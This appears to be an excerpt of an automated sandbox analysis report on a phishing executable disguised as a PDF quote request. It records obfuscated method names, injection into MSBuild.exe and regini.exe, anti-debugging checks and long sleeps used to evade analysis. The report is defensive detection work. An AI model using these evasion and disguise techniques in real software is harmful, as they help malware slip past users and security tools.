                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, f2i6HZrXmruBjgMFi9.csHigh entropy of concatenated method names: 'BwAo1f9EoZ', 'vOZoTCKGb7', 'L9LofsM4Xy', 'avmomhCt5Q', 'nVeo90rwXa', 'N4mounNhAV', 'nagopAUdF0', 'RNEo84t17X', 'EPAolJJppy', 'aAgo7iLURV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, lyDO55NGir3exlIpbG.csHigh entropy of concatenated method names: 'Dispose', 'SWGJjGbtQe', 'EyM4XSCf9K', 'mgBclQOIef', 'VxpJkSUBmI', 'RR8JzuEZBD', 'ProcessDialogKey', 'mOu4Muv6qV', 'GOf4JZ7uX2', 'iRd44yHAHu'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hT40iKJLBf5bHBRraTf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SewxVlpq1Y', 'o3exRMSTlb', 'XNgxb04GYr', 'qWaxxQE6cN', 'cmKxcYHxml', 'VTuxHuoFd0', 'uiMxhyg0ht'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, X5j5JmLpPHLNnncO1L.csHigh entropy of concatenated method names: 'jxqJoJ6UC6', 'pOxJCsykVH', 'P1UJ6G9o9t', 'xZUJsbPa0a', 'VgkJFQhBWA', 'OmRJYIIsnU', 'tDNjIH7yiTpVs60c6k', 'KW0USvSqusuxvoYtu1', 'rNiJJcO66E', 'OUjJvBrX8y'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, IWYkp3wVTHLkM3PdwN.csHigh entropy of concatenated method names: 'sR5B8kWnuP', 'J0BBldvTdv', 'QdXB0Fi3Tq', 'geIBX0UDai', 'oYJBq6FD6j', 'BRtBedQLup', 'ElrBWfTKCb', 'xnJBU9Xa6N', 'WiBBKL4WV0', 'OGTBO3ZJeZ'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Nvtpmwl1UG9o9t1ZUb.csHigh entropy of concatenated method names: 'OTEImePWeQ', 'bvGIuVtfO6', 'G6RI87nqy9', 'W1aIljwEhj', 'S8hIFv80lq', 'bvxIYpNrPd', 'RKcIZO0yQW', 'OagIDfDHyQ', 'H8hIVYIcat', 'TE5IRZAvuR'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Wa0ahX7UnPHLaEgkQh.csHigh entropy of concatenated method names: 'FLvG9O8Xm5', 'PaRGpiq5NL', 'f83I52DmQD', 'Tk5Iq3eAWM', 'kRXIeEwath', 'qm4IQF2j7X', 'bxQIWsljcH', 'YVjIUHf8To', 'yRmIrt9T5u', 'gadIK7Y3Zh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, i1ysRwn5uJHGk9UWYS.csHigh entropy of concatenated method names: 'QDgZ6376M2', 'Ly0ZsoBjnU', 'ToString', 'ydUZdlvRRJ', 'fJiZNUDvlM', 'VDPZI1Omsh', 'sHEZGKoAUt', 'ojIZiOMvxU', 'JIuZoDTd0t', 'UhAZC9D8NV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, SHAHu8kwuXP8wLUNau.csHigh entropy of concatenated method names: 'ABwRIjqQg3', 'CCYRGYMoCD', 'hKoRiT18uG', 'VQ0RoRqyjl', 'Qh7RV28Ug3', 'KLTRCO3nR7', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, FeHwFRQmPhA6QUTvmZ.csHigh entropy of concatenated method names: 'JNuiyAVAhn', 'uHEinQWvim', 'TnViACOyBI', 'ToString', 'jJLiSMvL2q', 'vfYiE9jbGN', 'T4AaxLK0XF5x7dghKuE', 'ORk4QTKqpv41Jgo9Gt4', 'oPa5UjK5ptlZlcagNZU', 'OqE7Z1KZadl7FAIwCKj'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, rofaPZzvm0BOLRapa7.csHigh entropy of concatenated method names: 'MEpRu7xLZ4', 'xjRR8yQjV5', 'TNORlhrUhK', 'WH7R0fywrT', 'qMVRXe97o1', 'KtpRqTciYu', 'bAYRekW7GF', 'xOdRhABwMx', 'KHTR1lGJFG', 'OGHRTpw3RS'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, fHFDdmJJtlfWjgtnRKg.csHigh entropy of concatenated method names: 'w8ZRkTW7Ts', 'rkjRzqFkcP', 'zb4bMCXY9l', 'NLbbJVk2Pc', 'W7lb40WjNx', 'xaGbvZ2TPA', 'BpIbLijdC4', 'cgsbaSOf2e', 'rcPbdmBoT8', 'lelbNQlk9X'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, IJ6UC68YOxsykVHtee.csHigh entropy of concatenated method names: 'CO7Ntqn4eT', 'uphN25T4KN', 'X5aNyiAh7i', 'J9eNnjUMrO', 'dbINAcp3oj', 'VHRNSNkOUQ', 'QmyNE2yMZJ', 'JZiNPyaI4G', 'FuONjoHwrt', 'FQwNkX4dQi'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, tK9regIp9dFBPQdRwr.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xYe4jZEDek', 'tUS4kE0knv', 'jps4zbZCrV', 'P7LvMTX4DL', 'K25vJNMbsI', 'krQv4tABUl', 'VRyvvIHnWw', 'sSbSVV4mIOcc4f8mNnX'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, nWAOmR0IIsnUrZnq0A.csHigh entropy of concatenated method names: 'vEfiamu9BJ', 'yoviN2aRbB', 'zJ8iG0oTq8', 'OECiosVftY', 'OBFiCUlYoC', 'hBxGAkmqn1', 'eQ6GSxJHrK', 'BwuGE86d3V', 'QFsGPZX7oY', 'suSGjAVVyf'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, vvfvNJJM7tDt7xHoMrm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T9pROh3RMF', 'Sy3R36xEmD', 'YpQRwTMVFl', 'tw9RtEjBhb', 'JvAR2Tsh6Y', 'mU8RyO7D0n', 'nfZRnKSE9Y'

                Hooking and other Techniques for Hiding and Protection

                Source: Possible double extension: pdf.exe Static PE information: RFQ3978 39793980.pdf.exe
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: RFQ3978 39793980.pdf.exe PID: 6668, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 25B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 2710000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 4710000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 7550000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 8550000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 8700000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: 9700000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: A1B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: B1B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Memory allocated: C1B0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0115096E rdtsc 5_2_0115096E
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\regini.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe TID: 1368 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 1740 Thread sleep count: 34 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 1740 Thread sleep time: -68000s >= -30000s
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe TID: 6192 Thread sleep time: -40000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_004BC530 FindFirstFileW,FindNextFileW,FindClose, 7_2_004BC530
                Source: firefox.exe, 0000000A.00000002.2651352848.000001E20D98C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^N
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561014505.000000000142F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0115096E rdtsc 5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00417833 LdrLoadDll, 5_2_00417833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BA118 mov ecx, dword ptr fs:[00000030h] 5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BA118 mov eax, dword ptr fs:[00000030h] 5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BA118 mov eax, dword ptr fs:[00000030h] 5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BA118 mov eax, dword ptr fs:[00000030h] 5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011D0115 mov eax, dword ptr fs:[00000030h] 5_2_011D0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h] 5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h] 5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h] 5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h] 5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01140124 mov eax, dword ptr fs:[00000030h]5_2_01140124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A8158 mov eax, dword ptr fs:[00000030h]5_2_011A8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116154 mov eax, dword ptr fs:[00000030h]5_2_01116154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116154 mov eax, dword ptr fs:[00000030h]5_2_01116154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C156 mov eax, dword ptr fs:[00000030h]5_2_0110C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov ecx, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4164 mov eax, dword ptr fs:[00000030h]5_2_011E4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4164 mov eax, dword ptr fs:[00000030h]5_2_011E4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A197 mov eax, dword ptr fs:[00000030h]5_2_0110A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A197 mov eax, dword ptr fs:[00000030h]5_2_0110A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A197 mov eax, dword ptr fs:[00000030h]5_2_0110A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01150185 mov eax, dword ptr fs:[00000030h]5_2_01150185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CC188 mov eax, dword ptr fs:[00000030h]5_2_011CC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CC188 mov eax, dword ptr fs:[00000030h]5_2_011CC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4180 mov eax, dword ptr fs:[00000030h]5_2_011B4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4180 mov eax, dword ptr fs:[00000030h]5_2_011B4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D61C3 mov eax, dword ptr fs:[00000030h]5_2_011D61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D61C3 mov eax, dword ptr fs:[00000030h]5_2_011D61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011401F8 mov eax, dword ptr fs:[00000030h]5_2_011401F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E61E5 mov eax, dword ptr fs:[00000030h]5_2_011E61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01194000 mov ecx, dword ptr fs:[00000030h]5_2_01194000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6030 mov eax, dword ptr fs:[00000030h]5_2_011A6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A020 mov eax, dword ptr fs:[00000030h]5_2_0110A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C020 mov eax, dword ptr fs:[00000030h]5_2_0110C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112050 mov eax, dword ptr fs:[00000030h]5_2_01112050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196050 mov eax, dword ptr fs:[00000030h]5_2_01196050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113C073 mov eax, dword ptr fs:[00000030h]5_2_0113C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111208A mov eax, dword ptr fs:[00000030h]5_2_0111208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D60B8 mov eax, dword ptr fs:[00000030h]5_2_011D60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D60B8 mov ecx, dword ptr fs:[00000030h]5_2_011D60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011080A0 mov eax, dword ptr fs:[00000030h]5_2_011080A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A80A8 mov eax, dword ptr fs:[00000030h]5_2_011A80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011920DE mov eax, dword ptr fs:[00000030h]5_2_011920DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C0F0 mov eax, dword ptr fs:[00000030h]5_2_0110C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011520F0 mov ecx, dword ptr fs:[00000030h]5_2_011520F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0110A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011180E9 mov eax, dword ptr fs:[00000030h]5_2_011180E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011960E0 mov eax, dword ptr fs:[00000030h]5_2_011960E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C310 mov ecx, dword ptr fs:[00000030h]5_2_0110C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130310 mov ecx, dword ptr fs:[00000030h]5_2_01130310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A30B mov eax, dword ptr fs:[00000030h]5_2_0114A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A30B mov eax, dword ptr fs:[00000030h]5_2_0114A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A30B mov eax, dword ptr fs:[00000030h]5_2_0114A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov eax, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov ecx, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov eax, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov eax, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov ecx, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B8350 mov ecx, dword ptr fs:[00000030h]5_2_011B8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DA352 mov eax, dword ptr fs:[00000030h]5_2_011DA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E634F mov eax, dword ptr fs:[00000030h]5_2_011E634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B437C mov eax, dword ptr fs:[00000030h]5_2_011B437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108397 mov eax, dword ptr fs:[00000030h]5_2_01108397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108397 mov eax, dword ptr fs:[00000030h]5_2_01108397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108397 mov eax, dword ptr fs:[00000030h]5_2_01108397
